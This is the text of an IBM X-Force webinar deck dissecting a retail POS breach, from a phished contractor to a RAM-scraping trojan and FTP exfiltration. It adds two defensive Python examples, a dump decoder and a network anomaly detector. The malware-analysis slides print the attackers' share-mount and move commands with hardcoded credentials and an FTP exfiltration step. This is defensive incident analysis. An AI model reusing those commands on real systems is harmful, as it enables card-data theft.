Published on February 19, 2014
IBM Security Systems
Anatomy of an Advanced Retail Breach
Chris Poulin, Research Strategist, X-Force
February 2014
© 2014 IBM Corporation
Agenda
– About the IBM X-Force
– Dissection of a retail attack and data breach
– Solutions to prevent similar compromises

Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.
X-Force is the foundation for advanced security and threat research across the IBM Security Framework
The mission of X-Force is to:
– Monitor and evaluate the rapidly changing threat landscape
– Research new attack techniques and develop protection for tomorrow’s security challenges
– Educate our customers and the general public
Collaborative IBM teams monitor and analyze the changing threat landscape
Coverage:
– 20,000+ devices under contract
– 3,700+ managed clients worldwide
– 15B+ events managed per day
– 133 monitored countries (MSS)
– 1,000+ security related patents
Depth:
– 17B analyzed web pages & images
– 40M spam & phishing attacks
– 73K documented vulnerabilities
– Billions of intrusion attempts daily
– Millions of unique malware samples
Anatomy of the Breach
1. Attacker phishes a 3rd party contractor
2. Attacker uses stolen credentials to access contractor portals
3a. Attacker finds & infects internal Windows file server
3b. Attacker finds & infects POS systems w/malware
4. Malware scrapes RAM for clear text CC stripe data
5. Malware sends CC data to internal server; sends custom ping to notify
6. Stolen data is exfiltrated to FTP servers
Diagram elements: contractor portals, firewall, retailer internal network (Windows file server and POS systems), attacker FTP servers (external/Russia)
1. Phish a 3rd Party Contractor
– HVAC firm in PA
– Email malware campaign
• Citadel password stealing bot, variant of Zeus banking trojan
– Primary method of malware detection: free version of Malwarebytes Anti-Malware
• On-demand scanning; not for commercial use
– Supplier portal contains lots of public information
• Example: list of resources for HVAC companies
2. Access & exploit contractor portal
– Contractor portal: service.ariba.com, 126.96.36.199, NS @ ariba.com
– Contractors generally not required to use token or other 2-factor authentication
– amlogin.ewips.partnersonline.com, 188.8.131.52, NS @ retailer.com
– pdzone.retailer.com, 184.108.40.206, NS @ retailer.com
3a. Discover & exploit internal file server
– Exact method of movement from portal to internal server unknown
– Probably not via the HVAC partner: cloud-based, not on retailer extranet
– Back-end connection from partner portal or other retailer-owned asset?
– SQL injection, browser exploit, open ingress port, who knows?
– Or maybe contractors had access to the internal network to monitor HVAC systems remotely
3a. Discover & exploit internal file server (cont’d)
– Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata
• Created by username John.Doe
• Printed recently on Windows DOMAIN
– Google search easily reveals location of retail datacenters
– Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers)
• Username "Best1_user"; password "BackupU$r"
• Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC
• Installed as "BladeLogic", hiding as a BMC component (BladeLogic Automation Suite); however, BMC doesn’t name any component "bladelogic.exe"
• System / Administrator level account; can run batch jobs
3b. Find & infect POS systems
– With a point of presence on an internal server, it’s all unicorns and rainbows from here. (Evil unicorns.)
– Attacker finds & infects POS systems w/malware, moving from the retailer Windows file server to the retailer POS systems
Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/
4. Malware scrapes card data from RAM
– Trojan.POSRAM, variant of BlackPOS
– No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure
– Looks for "pos.exe" process
– Installs trojan, creates registry entries containing string "POSWDS"
– Scrapes RAM for track 1 and track 2 data of financial cards
– Card track data is encrypted
• between the reader and POS, and
• again between the POS and payment processor
– Unencrypted momentarily at the POS as the transaction is cleared
– Debit card PINs are hashed at the card reader
– Chip-and-PIN encrypts the transaction from the card to processor
– Stores stolen card data in file %SystemRoot%\system32\winxml.dll
5. Harvested card data is sent to internal rally point
– Moves stolen card data to a central collection point
• Assumes POS systems have no internet access
– Creates temp Windows share on domain
• Malware on rally point creates share in %windir%\twain_32
– Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau
– Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt
– POS malware sends custom ICMP to the rally point as a semaphore
– Command sequence run on the infected POS against the retailer Windows file server:
  net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$r
  move %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt
  net use S: /del
6. Card data is exfiltrated to FTP servers in Russia
– Compiles all card dumps into c:\windows\twain_32\a.dll
– Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin
– Generates an FTP script and executes ftp -s <path>\cmd.txt
– Stolen data flows from the retailer Windows file server to attacker FTP servers (external/Russia)
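The custom base64 alphabet (slide 12) and the compiled dump file (slide 13) are the artifacts an incident responder actually gets to hold, and the impact questions on the later incident response slides start from them. The triage helper below is an added example, not IBM's code and not part of the deck: it maps the custom alphabet back to standard base64, scans the decoded bytes for track 2 records, keeps only Luhn-valid PANs and reports them masked. The track 2 regex, the masking format and the fixture (built from industry test card numbers, one of them deliberately Luhn-invalid) are assumptions of this example.

```python
import base64
import re

# Custom base64 alphabet the deck reports for the rally-point encoding (slide 12).
CUSTOM_ALPHABET = "JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau"
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TO_STD = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)
TO_CUSTOM = str.maketrans(STD_ALPHABET, CUSTOM_ALPHABET)

# Track 2 layout (assumed for this example): PAN '=' YYMM service-code discretionary-data '?'
TRACK2_RE = re.compile(r"(?<!\d)(\d{13,19})=(\d{2})(\d{2})(\d{3})")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check, which weeds out digit runs the regex matched by accident."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 if d < 5 else d * 2 - 9
        total += d
    return total % 10 == 0


def decode_custom_b64(blob: str) -> bytes:
    """Map the custom alphabet back to standard base64, re-pad, and decode."""
    std = blob.translate(TO_STD).rstrip("=")
    return base64.b64decode(std + "=" * (-len(std) % 4))


def triage_dump(blob: str) -> list:
    """Return one masked record per distinct Luhn-valid PAN found in an encoded dump."""
    text = decode_custom_b64(blob).decode("latin-1")
    records = {}
    for m in TRACK2_RE.finditer(text):
        pan, yy, mm, svc = m.groups()
        if luhn_ok(pan) and pan not in records:
            records[pan] = {"pan": pan[:6] + "*" * (len(pan) - 10) + pan[-4:],
                            "expiry": f"{mm}/{yy}", "service_code": svc}
    return list(records.values())


# Constructed fixture: industry test card numbers, not real cards; the last PAN fails Luhn.
SAMPLE_PLAINTEXT = (
    "%B4111111111111111^DOE/JOHN^25121011234567890?"
    ";4111111111111111=25121011234567890?\n"
    ";5555555555554444=26051010000000000?\n"
    ";4111111111111112=26051010000000000?\n"
)
SAMPLE_DUMP = base64.b64encode(SAMPLE_PLAINTEXT.encode()).decode().translate(TO_CUSTOM)
```

Running `triage_dump(SAMPLE_DUMP)` yields two records, because the duplicate track 1/track 2 copy of the first PAN collapses into one and the Luhn-invalid PAN is dropped.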
Protect endpoints
– The ultimate prize:
• POS systems: where the card data is processed
• File servers: base of operations
• Web servers: initial incursion vector
• Contractor workstations: intelligence, credentials
– Malware protection:
• Contractor workstations (phishing, Citadel bot)
• POS systems: RAM scraper trojan
• File servers: data management and exfiltration tools
• Application isolation (Intel SGX, micro-virtualization, etc.) to prevent RAM scraping
– Patch
– Configuration management
Protection against web and file server compromises
– Secure development lifecycle (SDLC)
• Secure coding practices training
• Static/source code analysis: manual (code review) and automated
• Dynamic code analysis (esp. the low hanging fruit: SQL injection & XSS)
• Include compiled applications, web applications, mobile apps
– Go-live security process
• Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords)
• Install appropriate endpoint protection and configuration management
• Vulnerability scan
– Appropriate authentication
• Separate domains / administrative credentials (identity separation)
• Multi-factor authentication
Segment critical assets
– Enumerate & classify
– Restrict web assets’ access to internal systems
– Isolate public / partner facing assets from private assets
– Segment operational technology (OT), critical assets, and general IT
– Perform firewall rule analysis, paying special attention to:
• assets containing sensitive data, such as cardholder information
• risky protocols and flow directions
– For example, POS systems shouldn’t
• mount Windows shares, or
• send regular ICMP packets
Image source: http://nationalgeographic.com
Monitor & detect: network
– Network activity pattern monitoring can detect:
• Suspicious scanning activity as the attacker maps out the network landscape
• Policy violations for outbound FTP, especially to Eastern Bloc countries
– Network packet inspection can detect:
• IPS can stop SQL injection, XSS, and other more advanced attacks
• Credit card number patterns in outbound data
• Suspect strings in ICMP packets
• Network traffic that is not what it seems, e.g. non-DNS protocol over port 53, IRC over port 80
Monitor & detect: vulnerability and anomaly detection
– Vulnerability scanning, including deep endpoint assessment
• example: registry entries containing "POSWDS"
– Anomaly detection
• Profile behavior of critical assets, e.g. POS and HVAC systems (if remote access)
• Detect deviations from baseline: POS connecting to Windows shares; POS emitting ICMP packets
• General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP
• Profile ICMP packet sizes and normal payload contents; identify & block deviations
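The segmentation rules and the anomaly baselines on the three slides above (POS systems must not mount shares or emit ICMP, outbound FTP to external hosts is a policy violation, scanning and ICMP size deviations are anomalies) translate directly into checks over flow records. The detector below is an added example, not IBM's code and not part of the deck; the POS subnet, the internal address ranges, the ICMP payload baseline, the sweep threshold and the sample flows are all assumed or constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Assumed layout for this example: POS terminals live in 10.50.0.0/16 and anything
# outside the RFC 1918 ranges counts as external.
POS_SUBNET = ipaddress.ip_network("10.50.0.0/16")
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SMB_PORTS = {139, 445}
FTP_PORTS = {20, 21}
ICMP_BASELINE_SIZES = {32, 56}   # payload sizes observed while baselining (constructed)
SWEEP_THRESHOLD = 20             # distinct hosts one source touches on one port


def analyse_flows(flows):
    """Return (source, rule, detail) tuples for flows that break the POS segment policy."""
    alerts = []
    peers = defaultdict(set)  # (src, dport) -> destination hosts, for sweep detection
    for f in flows:
        src, dst = ipaddress.ip_address(f["src"]), ipaddress.ip_address(f["dst"])
        from_pos = src in POS_SUBNET
        external = not any(dst in net for net in INTERNAL_NETS)
        if f["proto"] == "tcp":
            peers[(f["src"], f["dport"])].add(f["dst"])
            if from_pos and f["dport"] in SMB_PORTS:
                alerts.append((f["src"], "pos-smb", f"POS host opened a share on {f['dst']}"))
            if f["dport"] in FTP_PORTS and external:
                alerts.append((f["src"], "outbound-ftp", f"FTP to external host {f['dst']}"))
        elif f["proto"] == "icmp":
            if from_pos:
                alerts.append((f["src"], "pos-icmp", f"POS host sent ICMP to {f['dst']}"))
            if f["size"] not in ICMP_BASELINE_SIZES:
                alerts.append((f["src"], "icmp-size", f"ICMP payload of {f['size']} bytes"))
    for (src, dport), hosts in peers.items():
        if len(hosts) >= SWEEP_THRESHOLD:
            alerts.append((src, "sweep", f"{len(hosts)} hosts on tcp/{dport}"))
    return alerts


# Constructed sample: a POS terminal mounting a share on the file server and pinging it with
# an oversized payload, the file server sweeping the POS segment on tcp/445 and pushing data
# to an external FTP server, plus benign workstation traffic that must stay quiet.
SAMPLE_FLOWS = [
    {"src": "10.50.1.23", "dst": "10.20.0.5", "proto": "tcp", "dport": 445},
    {"src": "10.50.1.23", "dst": "10.20.0.5", "proto": "icmp", "size": 120},
    {"src": "10.20.0.5", "dst": "203.0.113.7", "proto": "tcp", "dport": 21},
    {"src": "10.10.4.8", "dst": "10.20.0.5", "proto": "tcp", "dport": 445},
    {"src": "10.10.4.8", "dst": "10.20.0.5", "proto": "icmp", "size": 32},
] + [{"src": "10.20.0.5", "dst": f"10.50.1.{i}", "proto": "tcp", "dport": 445}
     for i in range(1, 31)]
```

`analyse_flows(SAMPLE_FLOWS)` raises five alerts (share mount, ICMP and oversized ICMP from the POS, external FTP and a 30-host sweep from the file server) and nothing for the workstation.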
Incident Response
– Speedy and complete forensics
• early in the process if the compromise is detected before data is stolen, or
• after a severe breach when accurate impact analysis is critical: Which systems were compromised? How many customers were affected? How much of the data comprised personal information?
– Instrument everything feasible, including POS systems and network activity
– Enrich with context from vulnerability assessment tools, change management transactions, and security intelligence feeds
Incident / emergency response
– Plan should include
• Detection
• Response and escalation
• Engaging law enforcement as appropriate
• Preservation of evidence
• Compliance with regulations and contractual agreements
• Customer and press notification
• Public relations
– Engage your contracted external emergency response agency in advance, so they can
• help you prepare for a breach, and
• gather context about your environment
– Test your process regularly
– Business associate contract and assessment
At IBM, the world is our security lab
– Security Operations Centers
– Security Research and Development Labs
– Institute for Advanced Security Branches
– More than 6,000 IBM researchers, developers, and subject matter experts, all focused on security
– 3,000 IBM security patents
Get Engaged with IBM X-Force Research and Development
– Follow us at @ibmsecurity and @ibmxforce
– Download X-Force security trend & risk reports: http://www.ibm.com/security/xforce/
– Subscribe to X-Force alerts at iss.net/rss.php or the IBM Security blog at www.securityintelligence.com
Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

www.ibm.com/security

© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way.
IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.